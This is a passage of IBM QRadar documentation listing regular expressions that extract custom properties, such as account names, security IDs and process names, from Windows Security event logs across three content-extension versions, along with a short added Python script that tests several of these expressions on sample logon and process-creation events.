Account Security ID No 1 Subject:\s+?Security ID:\s+(.*?)\s+(?:Subject:|Account Name)
Note: The Subject:\s+ ... regex is disabled by default, as it can return many event matches and affect performance.
Computer Name No 1 Workstation Name[:\s\\=]+([^\s&]+)\s+Source
Computer Name No 1 Source Workstation[:\s\\=]+([^\s&]+)\s+Error
Computer Name No 1 Caller Computer Name[:\s\\=]+([^\s&]+)(?:\s\s|$)
Computer Name No 1 from the computer ([^\s]+)
Error Code Yes 1 Error Code[:\\\s=]*([^\s&]+)
Error Code Yes 1 error status[:\\\s=]+([^\s&\.]+)
Error Code Yes 1 Result Code[:\\\s=]*([^\s&]+)
Error Code Yes 1 Error value[:\\\s=]+([^\s:&]+)
Error Code Yes 1 Failure Code[:\\\s=]*([^\s&]+)
Error Code Yes 1 Status[:\\\s=]*([^\s&]+)
EventID Yes 1 (?:EventID|EventIDCode|externalId)[:\s\\=]+(\d+)
EventID Yes 1 \d{1,2}\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)
EventID Yes 1 LEEF:[0-9\.]+\|Microsoft\|Windows\|.+\|(\d+)\|
Extended Error Code Yes 1 Sub[\s,_]*Status[:\\\s=]+([^\s&]+)
Filename Yes 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*?\\([^\\]*?)\s+(?:Handle ID|&&)
Filename Yes 1 Relative Target Name:\s.*\\(.*?)\s+Access Request Information:
Filename Yes 1 file:.*\\(.*?)\sowned\sby
File Directory Yes 1 file:(.*?)\\[^\\]*?\s+owned\sby
File Directory Yes 1 Relative Target Name:\s+(.*)\\.*?\s+Access Request Information:
File Directory Yes 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+(.*?)\\[^\\]*?\s+(?:Handle ID|&&)
File Extension Yes 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*?\\.*?\.([^\\\.]*?)\s+(?:Handle ID|&&)
File Extension Yes 1 Relative Target Name[:\s]*.*\\[^\.]*?\.(.*?)\s+Access Request Information:
File Extension Yes 1 file:.*\\.*?\.(.*?)\sowned\sby
File Path No 1 file:(.*?)\sowned\sby
File Path No 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\\=]+(.*?)\s+(?:Handle ID| &&)
File Path No 1 Relative Target Name:\s+(.*?)\s+Access Request Information:
Group Domain No 1 (?:Group Domain|Target Domain)[:=\s\\]+([^\s]+)
Group Domain No 1 Group[\s\:]+.*?Account Domain[\s\:\\=]+([^\s]+)
Group Domain No 1 (?:Group Domain|New Domain)[:=\s\\]+([^\s]+)
Group Name Yes 1 (?:Group Name|New Account Name)[:=\s\\]+(.*?)\s+(?:Group Domain|New Domain|Group:|&&)
Group Name Yes 1 (?:Group Name|Target Account Name)[:=\s\\]+(.*?)\s+(?:Group Domain|Target Domain|Group:|&&)
Group Name Yes 1 Group[\s\:]+.*?Account Name[\s\:\\=]+(.*?)\s+(?:Account Domain|&&)
Group Security ID No 1 Group[:\s]*Security ID[:=\s\\]+(.*?)\s+(?:Group Name|Group:|Account Name|&&)
Group Security ID No 1 Group[:\s]*Security ID[:=\s\\]+(.*?)\s+(?:Group Name|Group:|&&)
Group Security ID No 1 Target Account ID[:=\s\\]+(.*?)\s+(?:Caller User Name|&&)
Group Security ID No 1 New Account ID[:\s\\=]+(.*?)(?:\s+Caller User Name|&&)
GroupID No 1 Group ID[:\s\\=]*(\d+)
Home Directory No 1 Home Directory[:\s]*(.*?)\s+Home Drive:
Initiator User Name Yes 1 Subject.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&)
Logon Type Yes 1 Logon Type[:\s\\=]+(\d+)
Message No 1 Message=(.+)
ObjectName Yes 1 Object Name[:\s\\=]+(.*?)\s+(?:Object Value Name|&&)
ObjectName Yes 1 Object Name[:\s\\=]+(.*?)\s+(?:Handle ID|&&)
Note: The Success Audit event in the System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
ObjectType No 1 Object Type[:\s\\=]*([^\s&]*)
Parent Process Name No 1 Process Name.*\\(.*?)\s+Target Process
Parent Process Name No 1 Creator Process Name[:\s]+(?:.*\\)?(.*?)\s+Process Command Line
Parent Process Path No 1 Process Name[:\s\\=]+(.*?)\s+(?:Target Process|&&)
Parent Process Path No 1 Creator Process Name[:\s]+(.*?)\s+Process Command Line:
Process CommandLine Yes 1 Process Command Line[:\s\\=]+(.*?)\s*(?:Token Elevation Type|\t|\s\s|&&)
Process Name Yes 1 Process Name[:\s\\=]+(?:.*\\)+(.*?)\s+(?:Network Information|\s|&&)
Process Name Yes 1 New Process Name[:\s\\=]+.*?\\([^\\]*?)\s+(?:Token Elevation Type:|&&)
Process Name Yes 1 Target Process Name.*\\(.*?)\s+(?:New Token Information|&&)
Note: The System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
Process Path No 1 New Process Name[:\s\\=]*(.*?)\s+(?:Token Elevation Type:|&&)
Process Path No 1 Caller Process Name[:\s\\=]+(.*?)\s+(?:Network Information|&&)
Record Number No 1 RecordNumber=(\d*)
Registry Key Yes 1 Object Name[:\s\\=]+\\REGISTRY\\USER\\.*?\\.*?(\\.*?)\s+(?:Object Value Name|&&)
Registry Key Yes 1 Object Type[:\s\\=]+Key.*?Object Name[:\s\\=]+\\REGISTRY\\USER\\.*?\\.*?(\\.*?)\s+(?:Handle ID|&&)
Registry Key Yes 1 Object Type[:\s\\=]+Key.*?Object Name[:\s\\=]+\\REGISTRY\\MACHINE(\\.*?)\s+(?:Handle ID|&&)
Registry Key Yes 1 Object Name[:\s\\=]+\\REGISTRY\\MACHINE(\\.*?)\s+(?:Object Value Name|&&)
Registry Value Data Yes 1 New Value[:\\=]\s+(.+)
Registry Value Name Yes 1 Object Value Name[:\s\\=]+(.*?)\s+(?:Handle ID|&&)
SAM Account Name No 1 S(?:AM|am) Account Name[:\s]*(.*?)\s+Display Name:
Scope No 1 Scope:\s(.*?)\s+(\d+|$)
Service Name Yes 1 Service Name[:\s\\=]*(.*?)\s+(?:Service ID:|&&)
Service Name Yes 1 \\SYSTEM\\ControlSet\d*\\Services\\(.*?)\s+Object Value Name
Service Name Yes 1 Service Name[\:\s\=\\]*(.*?)\s+(?:Service File Name:|&&)
Share Name Yes 1 Share Name[:\s].*?\\([^\\]*?)\s+Share Path:
Share Path No 1 Share Path[\:\s]*(.*)
Share Path No 1 Share Path[\:\s]*(.*?)\s+Access Request Information:
Target Account Security ID No 1 New Logon.*?Security ID[:\s\\=]+(.*?)\s+(?:Account Name|&&)
Target Account Security ID No 2 (Assigned\sTo|Removed\sFrom):\s+(.*?)\s+?(Assigned|Removed)\sBy:
Target Account Security ID No 1 New Token Information[:\=\s\\]+Security ID[:\=\s\\]+(.*?)\s+(?:Account Name|&&|\s)
Target Account Security ID No 1 Target Subject[:\s]*Security ID[:\s\\=]+(.*?)\s+(?:Account Name|&&)
Target Account Security ID No 1 Member[\:\s]+(?:Security )?ID[\:\s\\=]+(.*?)\s+(?:(?:Target\s)?Account Name|&&)
Target Account Security ID No 1 Target Account ID[:\s\\=]+(.*?)\s+(?:Caller Machine Name|&&)
Target Account Security ID No 1 Target Account.*?ID[:\s\\=]+(.*?)\s+(?:Account Name|Account Domain|Caller User Name|&&)
Target Account Security ID No 1 Target Account.*?ID[:\s\\=]+(.*?)\s+(?:Account Name|Caller User Name|&&)
Target Account Security ID No 1 New Account.*?ID[:\s\\=]+(.*?)\s+(?:Account Name|Caller User Name|&&)
Target Account Security ID No 1 Account That Was Locked Out[:\s]*Security ID[:\s\\=]+(.*?)\s+(?:Account Name|&&)
Target Account Security ID No 1 Account For Which Logon Failed.*?Security ID[\:\\\=\s]+(.*?)\s+(?:Account Name|&&)
Target Computer Domain No 1 New Computer Account:.*Account Domain:\s(.*?)\s+Attributes:
Target Computer Domain No 1 Computer Account That Was Changed:.*Account Domain:\s(.*?)\s+Changed Attributes:
Target Computer Domain No 1 Target Computer:.*Account Domain:\s(.*?)\s+Additional Information:
Target Computer Name No 1 Target Computer:.*Account Name[:\s]*(.*?)\s+Account Domain:
Target Computer Name No 1 Computer Account That Was Changed:.*Account Name[:\s]*(.*?)\s+Account Domain:
Target Computer Name No 1 New Computer Account:.*Account Name[:\s]*(.*?)\s+Account Domain:
Target User Domain No 1 New Account.*?Account Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Target Account.*?Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Target Account.*?Account Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 New Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Target.*?Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Target.*?Domain[:\s\\=]+([^\s]+)
Target User Domain No 1 Target Account ID[\:\\\=\s]+([^\s\\]+)(?:\\.*?)\s+Caller
Target User Domain No 1 Target Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Member[\:\s]+(?:Security )?ID[\:\s]+([^\s\\]*?)\\.*?\s+(?:Target\s)?Account Name
Target User Domain No 1 New Logon:.*?Account Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Account That Was Locked Out[\s\:]*Security ID[\:\\\=\s]+([^\s\\]+)(?:\\.*?)\s+Account Name
Target User Domain No 1 Account For Which Logon Failed.*?Account Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 New Token Information:.*?Account Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 Target Subject.*?Account Domain[\:\\\=\s]+([^\s]+)
Target User Domain No 1 dntdom=([^\s]+)
Target User Name Yes 1 Target Account.*?Name[\:\\\=\s]+(.*?)\s+(?:New Right:|Removed Right:|&&|\s)
Target User Name Yes 1 Member[\:\s]+(?:Security )?ID[\:\s]+(?:[^\s\\]*?)\\(.*?)\s+(?:Target\s)?Account Name
Target User Name Yes 1 Whose Credentials Were Used:.*?Name:[\:\\\=\s]+(.*?)\s+(?:Account Domain|Target Domain:|&&)
Target User Name Yes 1 Account That Was Locked Out.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Additional Information|&&)
Target User Name Yes 1 Target Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|Target Domain:|&&)
Target User Name Yes 1 Target Account.*?Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|Target Domain:|&&)
Target User Name Yes 1 Account For Which Logon Failed.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&)
Target User Name Yes 1 Target Account.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&|\s)
Target User Name Yes 1 Target Account Name[\:\\\=\s]+(.*?)\s+(?:Target Account ID:|&&)
Target User Name Yes 1 duser=([^&]*?)\s+duid
Target User Name Yes 1 New Account Name[:\s]*(.*?)\s*(?:Additional Information:|&&)
Target User Name Yes 1 Target Subject.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain|&&)
Target User Name Yes 1 New Account.*?Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|New Domain:|&&)
Target User Name Yes 1 New Token Information:.*?Account Name[\:\\\=\s]+(.*?)\s+(?:Account Domain:|&&)
Target User Name Yes 1 Target User Name[:\s\\=]*(.*?)\s*(?:Target Domain:|&&)
Target User Name Yes 1 New Logon.*?Name:[\:\\\=\s]+(.*?)\s+(?:Account Domain|Target Domain:|&&)
TaskName No 1 Task Name[\:\s\\=]*\\(.*?)\s+(?:Task Content:|&&)
TaskName No 1 Task Name[\:\s\\=]*\\(.*?)\s+(?:Task New Content:|&&)
Ticket Encryption Type Yes 1 Ticket Encryption Type[\s:\\=]*(0[xX][0-9a-fA-F]+)
User Domain No 1 Account Information:.*?Account Domain[\:\\\=\s]+([^\s]+)
User Domain No 1 Supplied Realm Name[:\s]+([^\s]+)
User Domain No 1 Caller Domain:\s+([^\s]+)
User Domain No 1 Subject.*?Domain[\:\\\=\s]{2,}([^\s]+)
User Domain No 1 User domain:\s+([^\s]+)
User Domain No 1 Primary Domain[:\s\\=]*([^\s]+)
User Principal Name No 1 User Principal Name[:\s]*(.*?)\s+Home Directory:
User Right No 1 User\sRight:\s+(.*?)\s+?(Assigned\sTo|Removed\sFrom):
User Workstations No 1 User Workstations[:\s]*(.*?)\s+Password Last Set:

The following custom event properties are removed from IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4. The removal will not affect your environment. You can review your property usage and update to the replacement property as needed.

Table 21. Replaced custom properties in 1.0.4
Removed custom property Replaced by
Account Locked Out Account Name Target User Name
Account Locked Out Security ID Target Account Security ID
Account Logon Failed Account Domain Target User Domain
Account Logon Failed Account Name Target User Name
Account Logon Failed Security ID Target Account Security ID
AccountDomain User Domain
AccountName Initiator User Name
Caller Computer Name Computer Name
Caller Domain User Domain
Caller Process Name Process Path
File Filename, File Extension

Member Account Name Target User Name
Member Security ID Target Account Security ID
New Account Domain Target User Domain
New Account Name Target User Name
New Account Security ID Target Account Security ID
New Logon Account Domain Target User Domain
New Logon Account Name Target User Name
New Logon Security ID Target Account Security ID
New Process Name Process Name

The original property (New Process Name) returned the process path (directory and name together). The new property (Process Name) returns only the process name.

New Token Account Domain Target User Domain
New Token Account Name Target User Name
New Token Security ID Target Account Security ID
Primary Domain User Domain
Realm User Domain
Source Workstation Computer Name
Subject Account Domain User Domain
Subject Account Name Initiator User Name
Subject Security ID Account Security ID
Target Account Domain Target User Domain
Target Account Name Target User Name
Target Domain Target User Domain
Target Process Name Process Name


IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.1

The following table shows the custom event properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.1.

Table 22. Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.1
Name Optimized Capture Group Regex
Accesses Yes 1 [\s\s|\t]Accesses:\s{0,2}(.*?)($|\s+(Access\s(Check\sResults|Mask|Reasons)|Privileges):)
Account Locked Out Account Name No 2 \s\sAccount\sThat\sWas\sLocked\sOut:\s\s+(.*?)\s\sAccount\sName:\s\s+(.*?)\s\s
Account Locked Out Security ID No 2 \s\sAccount\sThat\sWas\sLocked\sOut:(\s{2,3})Security\sID:\s\s(.*?)\s\s
Account Logon Failed Account Domain No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
Account Logon Failed Account Name No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
Account Logon Failed Security ID No 1 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s\sSecurity\sID:\s\s(.*?)\s\s
Account Security ID No 2 \s\sAccount\sInformation:\s\s(Security|.+User)\sID:\s+(.*?)\s\s
AccountDomain Yes 3 \s\sAccount\sInformation:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
AccountID Yes 1 Deprecated
AccountName Yes 1 Deprecated
AccountName Yes 1 Deprecated
AccountName Yes 1 Deprecated

Assigning Process Image File Name No 2 \s\sAssigning\sProcess\sInformation:\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
Caller Computer Name No 1 \s\sCaller\sComputer\sName:\s(.*?)(\s$|\t)
Caller Domain No 2 \sCaller\sDomain:(\s?)(.*?)\s(\s|Caller\sLogon\sID:)
Caller Process Name No 1 \s\sCaller\sProcess\sName:\s(.*?)\s\s
Caller User Name No 3 \sCaller\sUser(\sN|n)ame:(\s?)(.*?)\s(\s|Caller\sDomain:)
ChangedAttributes Yes 1 Changed\sAttributes:\s+(.*)
Client Domain No 2 \s\sClient\sDomain:(\s{0,2})(.*?)\s\s
Client User Name No 2 \s\sClient\sUser\sName:(\s{0,2})(.*?)\s\s
Computer No 7 (\tComputer=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t)(.*?)\t
Credentials Used Account Domain No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
Credentials Used Account Name No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:(\s{2,3})Account\sName:(\s{1,2})(.*?)\s\s
Domain No 4 (\s|Successful\sLogon:\s(.*?))\sDomain:(\s{1,2})(.*?)\s(\s|Logon\sID:)
Error Code No 8 (\s|[Mm]essage=)[Ee]rror(:|(\s([Cc]ode((\swas|\sreturned\s.+\sprocessor)?)(:?)|status:|value:|:)))\s?(.*?)([ .:,]|$)
Event ID Code No 1 \tEventIDCode=(.*?)\t
EventID Yes 1 \d{1,2}\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)
EventID Yes 1 EventID=(\d+)
EventID Yes 1 LEEF:[0-9\.]+\|Microsoft\|Windows\|.+\|(\d+)\|

File No 3 (\s|,)\s[Ff]ile:(\s?)(.*?)(,\s|\sowned\sby)
Group Domain No 2 (\s|\t)Group\sDomain:\s*(.*?)(\s\s|\t)
Group Domain No 3 \s(Target|Group)\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)

Group Name No 2 (\s|\t)Group\sName:\s*(.*?)(\t|\s(\s|Group\sDomain:))
Group Name No 6 \s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain|Group\sDomain:)

Group Security ID No 3 (\s|\t)Group:(\s+|\t)Security\sID:\s*(.*?)(\s\s|\t)
Group Security ID No 3 \s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group):\s{1,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(|\s|Caller\sUser\sName:)

GroupID Yes 1 Group ID: (\d+)
Home Directory No 2 \s\sHome\sDirectory:(\s{1,2})(.*?)\s\s
Logon Type No 1 \sLogon\sType:\s+(\d+)(\s|$)
Member Account Name No 5 (\s|\t)Member(:(\s+?|\t).*?(\s+?|\t)Account)?\sName:\s*(.*?)(\t|\s+?(Group|Member\sID):)
Member Security ID No 4 (\s|\t)Member(:(\s+?|\t)Security)?\sID:\s*(.*?)(\t|(\s+?(Target\s)?Account\sName:))
Message No 1 (\t[Mm]essage=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(\t?))(.+)
New Account Domain No 6 \s\sNew\sAccount((\sName)?):\s(.*?)\s\s(Account|New)\sDomain:(\s{1,2})(.*?)\s\s
New Account Name No 5 \s\sNew\sAccount((:\s\s(.*?)\s\sAccount)?)\sName:(\s{1,2})(.*?)\s\s
New Account Security ID No 2 \s\sNew\sAccount(:\s{2,3}Security)?\sID:\s{1,2}(.*?)\s\s
New Logon Account Domain No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
New Logon Account Name No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sName:(\s{1,2})(.*?)\s\s
New Logon Security ID No 3 \s\sNew\sLogon:(\s{2,3})Security\sID:(\s{1,2})(.*?)\s\s
New Process Image File Name No 3 \s\s(New\sProcess\sInformation|A\snew\sprocess\shas\sbeen\screated):\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
New Process Name No 2 \sNew\sProcess\sName:(\s?)(.*?)\s(\s|Token\sElevation\sType:)
New Token Account Domain No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
New Token Account Name No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
New Token Security ID No 1 \s\sNew\sToken\sInformation:\s\sSecurity\sID:\s\s(.*?)\s\s
ObjectName Yes 1 Deprecated
ObjectName Yes 1 Deprecated

ObjectType Yes 1 Object\sType:\s{0,2}(.*?)\s+(Object\sName|Process\sID|Source\sAddress):
Primary Domain No 2 \s\sPrimary\sDomain:(\s{0,2})(.*?)\s\s
Primary User Name No 2 \s\sPrimary\sUser\sName:(\s?)(.*?)\s\s
Process Name No 2 \s\sProcess\sName:\s(\s?)(.*?)(\s\s|$)
Realm Yes 1 Supplied Realm Name: (.*?)[ ]
Record Number No 1 \tRecordNumber=(.*?)\t
SAM Account Name No 2 \sS(AM|am)\sAccount\sName:\s?(.*?)\s(\s|SID\sHistory:)
Scope Yes 1 Scope:\s(.*?)\s+(\d+|$)
Secondary User Name No 1 \tSecondaryUserName=(.*?)\t
Service Name No 5 \s(\s|Service\sInformation:\s)(Service\sName|Server:\s\s(.*?)\s\sService):(\s{0,2})(.*?)\s(\s|Server:|Service\sFile\sName:)
Share Name No 2 \sShare\sName:(\s{0,2})(.*?)\s(\s|Share\sPath:)
Source Workstation Yes 6 (\sSource\sWorkstation|The\slogon\sto\saccount:\s(.*?)\sby:\s(.*?)\sfrom\sworkstation|(\s|Authentication\sPackage:\s(.*?))\sWorkstation\sName|Caller\sWorkstation):\s(.*?)\s(\s|Caller\sUser\sName:|Error\sCode:)
Subject Account Domain No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sDomain:(\s{0,2})(.*?)\s(\s|Logon\sID:)
Subject Account Name No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sName:(\s{0,2})(.*?)\s(\s|Account\sDomain:)
Subject Security ID No 5 (\s\s|\t)Subject(\s?):(\s{1,3})Security\sID:(\s{0,2})(.*?)\s(\s|Account\sName:)
Target Account Domain No 3 \s\s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s\s(.*?)\s\sAccount\sDomain:\s{0,2}(.*?)(\s\s|\s$|\t)
Target Account Name No 6 \s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain:)
Target Account Security ID No 3 \s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s{2,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(\s|Caller\sUser\sName:)
Target Account Security ID No 2 (Assigned\sTo|Removed\sFrom):\s*(.*?)\s+?(Assigned|Removed)\sBy:

Target Domain No 2 \sTarget\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)
Target Process Name No 1 \s\sTarget\sProcess\sName:\s(.*?)\s\s
Target User Name No 1 \s\sTarget\sUser\sName:\s(.*?)\s\s
User Account No 1 \sUser\saccount:\s(.*?)\sUser\sdomain:
User Domain No 2 \sUser\s[Dd]omain:(\s{1,2})(.*?)\s(\s|\w+:)
User Name No 3 (\s|:)\sUser\s[Nn]ame:(\s?)(.*?)\s(\s|\w+:)
User Principal Name No 1 \s\sUser\sPrincipal\sName:\s(.*?)\s\s
User Right No 1 User\sRight:\s*(.*?)\s+?(Assigned\sTo|Removed\sFrom|$):
User Workstations No 1 \s\sUser\sWorkstations:\s(.*?)\s\s
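
Before a property from Table 22 is used in a rule or report, it is worth confirming what its capture group actually returns on the payload shape you receive. The following Python script is an added example, not part of the content extension or of IBM's documentation: it applies a handful of the Table 22 expressions (copied verbatim, with their capture-group numbers) to two constructed Windows Security payloads. The payload text, the trimming of surrounding whitespace, and the use of Python's `re` module (a close but not identical dialect to the Java regex engine QRadar uses) are assumptions.

```python
import re

# Subset of Table 22 (content extension 1.0.1): name -> (capture group, regex), copied verbatim.
PROPERTIES = {
    "Logon Type": (1, r"\sLogon\sType:\s+(\d+)(\s|$)"),
    "Subject Security ID": (5, r"(\s\s|\t)Subject(\s?):(\s{1,3})Security\sID:(\s{0,2})(.*?)\s(\s|Account\sName:)"),
    "Subject Account Name": (5, r"(\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sName:(\s{0,2})(.*?)\s(\s|Account\sDomain:)"),
    "New Logon Security ID": (3, r"\s\sNew\sLogon:(\s{2,3})Security\sID:(\s{1,2})(.*?)\s\s"),
    "New Logon Account Name": (3, r"\s\sNew\sLogon:\s\s(.*?)\s\sAccount\sName:(\s{1,2})(.*?)\s\s"),
    "New Process Name": (2, r"\sNew\sProcess\sName:(\s?)(.*?)\s(\s|Token\sElevation\sType:)"),
    "Source Workstation": (6, r"(\sSource\sWorkstation|The\slogon\sto\saccount:\s(.*?)\sby:\s(.*?)\sfrom\sworkstation|(\s|Authentication\sPackage:\s(.*?))\sWorkstation\sName|Caller\sWorkstation):\s(.*?)\s(\s|Caller\sUser\sName:|Error\sCode:)"),
}

# Constructed payloads (not captured from a real host), flattened into the
# "Label:  value  Label:  value" form that the expressions above expect.
EVENT_4624 = (
    "An account was successfully logged on.  Subject:  Security ID:  S-1-0-0  "
    "Account Name:  -  Account Domain:  -  Logon ID:  0x0  Logon Type:  3  "
    "New Logon:  Security ID:  S-1-5-21-1111-2222-3333-1105  Account Name:  jdoe  "
    "Account Domain:  CORP  Logon ID:  0x2F4A1  Process Information:  Process ID:  0x0  "
    "Process Name:  -  Network Information:  Workstation Name:  WS-0142  "
    "Source Network Address:  10.0.0.25  Source Port:  49812  "
    "Detailed Authentication Information:  Logon Process:  NtLmSsp  "
    "Authentication Package:  NTLM  Key Length:  128"
)
EVENT_4688 = (
    "A new process has been created.  Subject:  Security ID:  S-1-5-21-1111-2222-3333-1105  "
    "Account Name:  jdoe  Account Domain:  CORP  Logon ID:  0x2F4A1  "
    "Process Information:  New Process ID:  0x1a2c  "
    "New Process Name:  C:\\Windows\\System32\\cmd.exe  Token Elevation Type:  %%1936  "
    "Creator Process ID:  0x4f0"
)


def extract(payload: str, name: str):
    """Apply one custom property to a payload; None when the regex does not match.
    Surrounding whitespace is trimmed for readability (an assumption made here,
    not a documented QRadar behaviour): several groups start on a separator space."""
    group, pattern = PROPERTIES[name]
    match = re.search(pattern, payload)
    if match is None or match.group(group) is None:
        return None
    return match.group(group).strip()


def extract_all(payload: str) -> dict:
    """Run every property in PROPERTIES against one payload; keep only the matches.
    On a network logon (4624, type 3) the Subject is the local system ("-"), so the
    user of interest comes from the New Logon properties, not the Subject ones."""
    results = {}
    for name in PROPERTIES:
        value = extract(payload, name)
        if value is not None:
            results[name] = value
    return results


if __name__ == "__main__":
    for label, payload in (("4624", EVENT_4624), ("4688", EVENT_4688)):
        print(label)
        for name, value in extract_all(payload).items():
            print(f"  {name}: {value}")
```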

(Back to top)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.0

The following table shows the custom event properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.0.

Table 23. Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.0
Name Optimized Capture Group Regex
Accesses Yes 1 [\s\s|\t]Accesses:\s{0,2}(.*?)($|\s+(Access\s(Check\sResults|Mask|Reasons)|Privileges):)
Account Locked Out Account Name No 2 \s\sAccount\sThat\sWas\sLocked\sOut:\s\s+(.*?)\s\sAccount\sName:\s\s+(.*?)\s\s
Account Locked Out Security ID No 2 \s\sAccount\sThat\sWas\sLocked\sOut:(\s{2,3})Security\sID:\s\s(.*?)\s\s
Account Logon Failed Account Domain No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
Account Logon Failed Account Name No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
Account Logon Failed Security ID No 1 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s\sSecurity\sID:\s\s(.*?)\s\s
Account Security ID No 2 \s\sAccount\sInformation:\s\s(Security|.+User)\sID:\s+(.*?)\s\s
AccountDomain Yes 3 \s\sAccount\sInformation:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
AccountID Yes 1 Target Account ID: (.*?)
AccountName Yes 1 New Account Name: (.*?)
AccountName Yes 1 Target Account Name: (.*?)
AccountName Yes 1 Account Name:\s*(.+?)\s+(Additional Information|Account Domain|Service Information|SID History|Access Granted|Access Removed|Group|Display Name|Supplied Realm Name|Workstation|New Domain):

Assigning Process Image File Name No 2 \s\sAssigning\sProcess\sInformation:\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
Caller Computer Name No 1 \s\sCaller\sComputer\sName:\s(.*?)(\s$|\t)
Caller Domain No 2 \sCaller\sDomain:(\s?)(.*?)\s(\s|Caller\sLogon\sID:)
Caller Process Name No 1 \s\sCaller\sProcess\sName:\s(.*?)\s\s
Caller User Name No 3 \sCaller\sUser(\sN|n)ame:(\s?)(.*?)\s(\s|Caller\sDomain:)
ChangedAttributes Yes 1 Changed\sAttributes:\s+(.*)
Client Domain No 2 \s\sClient\sDomain:(\s{0,2})(.*?)\s\s
Client User Name No 2 \s\sClient\sUser\sName:(\s{0,2})(.*?)\s\s
Computer No 7 (\tComputer=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t)(.*?)\t
Credentials Used Account Domain No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
Credentials Used Account Name No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:(\s{2,3})Account\sName:(\s{1,2})(.*?)\s\s
Domain No 4 (\s|Successful\sLogon:\s(.*?))\sDomain:(\s{1,2})(.*?)\s(\s|Logon\sID:)
Error Code No 8 (\s|[Mm]essage=)[Ee]rror(:|(\s([Cc]ode((\swas|\sreturned\s.+\sprocessor)?)(:?)|status:|value:|:)))\s?(.*?)([ .:,]|$)
Event ID Code No 1 \tEventIDCode=(.*?)\t
